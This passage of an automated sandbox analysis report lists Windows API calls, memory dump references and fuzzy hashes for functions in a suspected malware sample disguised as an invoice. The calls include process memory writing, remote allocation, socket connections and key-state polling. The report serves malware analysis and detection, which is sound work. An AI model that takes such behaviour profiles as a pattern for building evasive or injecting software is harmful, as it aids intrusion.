                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00241341
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00241349
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1389676194-0
                                                              • Opcode ID: 775de487fbc17195f60715215803adfdf845afe1472f5da6b7999cbe193f17a8
                                                              • Instruction ID: 875c3076636697dd9bb9accfda6f2cc87c9ddc170bd8c2ea38d6f4a8d8c68250
                                                              • Opcode Fuzzy Hash: 775de487fbc17195f60715215803adfdf845afe1472f5da6b7999cbe193f17a8
                                                              • Instruction Fuzzy Hash: 88411C75A00109DFCB05EF64C985AAEBBF5FF18310B148095E90AAB3A2CB31ED51DF90
                                                              APIs
                                                              • GetCursorPos.USER32(000000FF), ref: 0020B64F
                                                              • ScreenToClient.USER32(00000000,000000FF), ref: 0020B66C
                                                              • GetAsyncKeyState.USER32(00000001), ref: 0020B691
                                                              • GetAsyncKeyState.USER32(00000002), ref: 0020B69F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AsyncState$ClientCursorScreen
                                                              • String ID:
                                                              • API String ID: 4210589936-0
                                                              • Opcode ID: dadcc5f9c04ffa3ae0fdf0ae4bbeb6aaf4aaa6a0e35b271cad512e476847e14d
                                                              • Instruction ID: dc03bca3818c8ed489331c040001164cd2a6c04c8dedc76a6fdb6cefe6dc31dc
                                                              • Opcode Fuzzy Hash: dadcc5f9c04ffa3ae0fdf0ae4bbeb6aaf4aaa6a0e35b271cad512e476847e14d
                                                              • Instruction Fuzzy Hash: E5416235A1421ABBCF259F64C844AE9BBB8BF05324F104315F829A61D1CB71ADA4DF91
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0022B369
                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 0022B413
                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0022B41B
                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 0022B429
                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0022B431
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleep$RectWindow
                                                              • String ID:
                                                              • API String ID: 3382505437-0
                                                              • Opcode ID: 7dca598fc415203cb8d1e719d2ba1ae55dfb951bf87a8419290e0ce1bf30e8f9
                                                              • Instruction ID: cfe34b6156d422f162d96760412c25565d011208c83596486e0f1cfb40d9d1d0
                                                              • Opcode Fuzzy Hash: 7dca598fc415203cb8d1e719d2ba1ae55dfb951bf87a8419290e0ce1bf30e8f9
                                                              • Instruction Fuzzy Hash: 5331C07191022AEBDF04CFA8ED4DA9E3BB5EF04325F104269F825A61D1C3B09964CB90
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0022DBD7
                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0022DBF4
                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0022DC2C
                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0022DC52
                                                              • _wcsstr.LIBCMT ref: 0022DC5C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                              • String ID:
                                                              • API String ID: 3902887630-0
                                                              • Opcode ID: af29fd43f84ac356bbc6bfbfa897e580238da07642e671f08ac3766c8c17e203
                                                              • Instruction ID: dc2f52f46c5aae9cfe440713fa5d2af1f7ebe23f9d9edd3a013eb9de82dfb109
                                                              • Opcode Fuzzy Hash: af29fd43f84ac356bbc6bfbfa897e580238da07642e671f08ac3766c8c17e203
                                                              • Instruction Fuzzy Hash: 26214931224211BBEB255F78FC49E7B7BACDF45720F10403AF809DA081EAA1CC51D6A0
                                                              APIs
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0022BC90
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0022BCC2
                                                              • __itow.LIBCMT ref: 0022BCDA
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0022BD00
                                                              • __itow.LIBCMT ref: 0022BD11
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: d902629475120bdcaa58e3b269c164e3dbebd9d7c2bd1ce2820a47349c2e5b5c
                                                              • Instruction ID: 20e62d9a154d3e61ec3f4a4ff900ec4d496fca34d9bd921260efaf362fed40e0
                                                              • Opcode Fuzzy Hash: d902629475120bdcaa58e3b269c164e3dbebd9d7c2bd1ce2820a47349c2e5b5c
                                                              • Instruction Fuzzy Hash: AE210835610628BFDB11AEA4AC4AFDF7BB9AF5A310F400025FA05EB181DB708D6587A1
                                                              APIs
                                                                • Part of subcall function 001F50E6: _wcsncpy.LIBCMT ref: 001F50FA
                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,002360C3), ref: 00236369
                                                              • GetLastError.KERNEL32(?,?,?,002360C3), ref: 00236374
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002360C3), ref: 00236388
                                                              • _wcsrchr.LIBCMT ref: 002363AA
                                                                • Part of subcall function 00236318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002360C3), ref: 002363E0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                              • String ID:
                                                              • API String ID: 3633006590-0
                                                              APIs
                                                                • Part of subcall function 0024A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0024A84E
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00248BD3
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00248BE2
                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00248BFE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              Similarity
                                                              • API ID: ErrorLastconnectinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 3701255441-0
                                                              APIs
                                                              • IsWindow.USER32(00000000), ref: 00248441
                                                              • GetForegroundWindow.USER32 ref: 00248458
                                                              • GetDC.USER32(00000000), ref: 00248494
                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 002484A0
                                                              • ReleaseDC.USER32(00000000,00000003), ref: 002484DB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              Similarity
                                                              • API ID: Window$ForegroundPixelRelease
                                                              • String ID:
                                                              • API String ID: 4156661090-0
                                                              APIs
                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0020AFE3
                                                              • SelectObject.GDI32(?,00000000), ref: 0020AFF2
                                                              • BeginPath.GDI32(?), ref: 0020B009
                                                              • SelectObject.GDI32(?,00000000), ref: 0020B033
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              Similarity
                                                              • API ID: ObjectSelect$BeginCreatePath
                                                              • String ID:
                                                              • API String ID: 3225163088-0
                                                              APIs
                                                              • __calloc_crt.LIBCMT ref: 002121A9
                                                              • CreateThread.KERNEL32(?,?,002122DF,00000000,?,?), ref: 002121ED
                                                              • GetLastError.KERNEL32 ref: 002121F7
                                                              • _free.LIBCMT ref: 00212200
                                                              • __dosmaperr.LIBCMT ref: 0021220B
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              Similarity
                                                              • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                              • String ID:
                                                              • API String ID: 2664167353-0
                                                              APIs
                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0022ABD7
                                                              • GetLastError.KERNEL32(?,0022A69F,?,?,?), ref: 0022ABE1
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,0022A69F,?,?,?), ref: 0022ABF0
                                                              • HeapAlloc.KERNEL32(00000000,?,0022A69F,?,?,?), ref: 0022ABF7
                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0022AC0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              Similarity
                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 842720411-0
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00237A74
                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00237A82
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00237A8A
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00237A94
                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00237AD0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              Similarity
                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                              • String ID:
                                                              • API String ID: 2833360925-0
                                                              APIs
                                                              • CLSIDFromProgID.OLE32 ref: 00229ADC
                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 00229AF7
                                                              • lstrcmpiW.KERNEL32(?,00000000), ref: 00229B05
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00229B15
                                                              • CLSIDFromString.OLE32(?,?), ref: 00229B21
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              Similarity
                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                              • String ID:
                                                              • API String ID: 3897988419-0
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0022AA79
                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0022AA83
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0022AA92
                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0022AA99
                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0022AAAF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0022AADA
                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0022AAE4
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0022AAF3
                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0022AAFA
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0022AB10
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0022EC94
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0022ECAB
                                                              • MessageBeep.USER32(00000000), ref: 0022ECC3
                                                              • KillTimer.USER32(?,0000040A), ref: 0022ECDF
                                                              • EndDialog.USER32(?,00000001), ref: 0022ECF9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              Similarity
                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                              • String ID:
                                                              • API String ID: 3741023627-0
                                                              APIs
                                                              • EndPath.GDI32(?), ref: 0020B0BA
                                                              • StrokeAndFillPath.GDI32(?,?,0026E680,00000000,?,?,?), ref: 0020B0D6
                                                              • SelectObject.GDI32(?,00000000), ref: 0020B0E9
                                                              • DeleteObject.GDI32 ref: 0020B0FC
                                                              • StrokePath.GDI32(?), ref: 0020B117
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                              • String ID:
                                                              • API String ID: 2625713937-0
                                                              • Opcode ID: 4cb9445e00f441e73f1934b8becd64ffcc158dd93a5fa0b3699f514e315a6b6e
                                                              • Instruction ID: b23af41548f535a686b629498175b542d3d941bb3b5a569132f087ec4bc5e4f5
                                                              • Opcode Fuzzy Hash: 4cb9445e00f441e73f1934b8becd64ffcc158dd93a5fa0b3699f514e315a6b6e
                                                              • Instruction Fuzzy Hash: FFF0B231010249AFDB229F6AFC1D7A53B69AB10362F888315E42D851F1C73189B6DF50
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 0023F2DA
                                                              • CoCreateInstance.OLE32(0027DA7C,00000000,00000001,0027D8EC,?), ref: 0023F2F2
                                                              • CoUninitialize.OLE32 ref: 0023F555
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateInitializeInstanceUninitialize
                                                              • String ID: .lnk
                                                              • API String ID: 948891078-24824748
                                                              • Opcode ID: 16f71bbb5989c2da7b0a92971d15ddf4fb016f1a6d52bf2326880ce1765ed08e
                                                              • Instruction ID: f0ac31b7ba9fff95281028ceba63b8ccad24d79d50be68b01d5befc80b4e0a29
                                                              • Opcode Fuzzy Hash: 16f71bbb5989c2da7b0a92971d15ddf4fb016f1a6d52bf2326880ce1765ed08e
                                                              • Instruction Fuzzy Hash: 99A139B1114305AFD300EF64C885EABB7ACEF98714F00491EF65597192EB70EA59CBA2
                                                              APIs
                                                                • Part of subcall function 001F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001F53B1,?,?,001F61FF,?,00000000,00000001,00000000), ref: 001F662F
                                                              • CoInitialize.OLE32(00000000), ref: 0023E85D
                                                              • CoCreateInstance.OLE32(0027DA7C,00000000,00000001,0027D8EC,?), ref: 0023E876
                                                              • CoUninitialize.OLE32 ref: 0023E893
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                              • String ID: .lnk
                                                              • API String ID: 2126378814-24824748
                                                              • Opcode ID: ff9e699b2fb081168a5b389a4051f2b08eb65e02abaccbba423afa5a9be6af9b
                                                              • Instruction ID: 466ee0db3de8f0310c288399922d98edcf5883ed1e4ccf8173754f4bd1733adb
                                                              • Opcode Fuzzy Hash: ff9e699b2fb081168a5b389a4051f2b08eb65e02abaccbba423afa5a9be6af9b
                                                              • Instruction Fuzzy Hash: 3CA146756043059FCB10EF24C484E6EBBE5BF89710F058999F99A9B3A1CB31EC49CB91
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 002132ED
                                                                • Part of subcall function 0021E0D0: __87except.LIBCMT ref: 0021E10B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__87except__start
                                                              • String ID: pow
                                                              • API String ID: 2905807303-2276729525
                                                              • Opcode ID: 93822cb87ecee2d01830cabe96f1efd082a323a974dd89d7f8716fd315c32256
                                                              • Instruction ID: ec064982094be1bbfb72a705c9f4cb9d04bedc6050f1525faa32b34aa07e0301
                                                              • Opcode Fuzzy Hash: 93822cb87ecee2d01830cabe96f1efd082a323a974dd89d7f8716fd315c32256
                                                              • Instruction Fuzzy Hash: D3514431A3920396CF11BF14DD153FA2BD5AB70710F208968FCA5821A9DF758DF89A86
                                                              APIs
                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0028DC50,?,0000000F,0000000C,00000016,0028DC50,?), ref: 00234645
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 002346C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper$__itow__swprintf
                                                              • String ID: REMOVE$THIS
                                                              • API String ID: 3797816924-776492005
                                                              • Opcode ID: b561c7e5494adb46a4f39463aeff22f615e7965b88011be622727e54cabc0788
                                                              • Instruction ID: b0c57724d43ede20206c8bc07fa037e371e8ba52aa4a85d1793c08bc4c422daf
                                                              • Opcode Fuzzy Hash: b561c7e5494adb46a4f39463aeff22f615e7965b88011be622727e54cabc0788
                                                              • Instruction Fuzzy Hash: C24183B4A1021A9FCF00FF64C881ABDB7B5FF45304F148099E916AB292DB30ED55CB50
                                                              APIs
                                                                • Part of subcall function 0023430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0022BC08,?,?,00000034,00000800,?,00000034), ref: 00234335
                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0022C1D3
                                                                • Part of subcall function 002342D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0022BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00234300
                                                                • Part of subcall function 0023422F: GetWindowThreadProcessId.USER32(?,?), ref: 0023425A
                                                                • Part of subcall function 0023422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0022BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0023426A
                                                                • Part of subcall function 0023422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0022BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00234280
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0022C240
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0022C28D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                              • String ID: @
                                                              • API String ID: 4150878124-2766056989
                                                              • Opcode ID: 5f7565fad19d3ac84a60fd444e99a2937dff983d4ebe7a916c1b1a41ea49a4eb
                                                              • Instruction ID: 848f902aca32f66e254fc1310ef81bcdc66489b4891aad9bb5628d9a8361fa83
                                                              • Opcode Fuzzy Hash: 5f7565fad19d3ac84a60fd444e99a2937dff983d4ebe7a916c1b1a41ea49a4eb
                                                              • Instruction Fuzzy Hash: 6B4139B2900229BFDB10EFA4DC81AEEB7B8AF09300F104195FA55B7191DA717E95CF61
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0028DC00,00000000,?,?,?,?), ref: 0025A6D8
                                                              • GetWindowLongW.USER32 ref: 0025A6F5
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0025A705
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
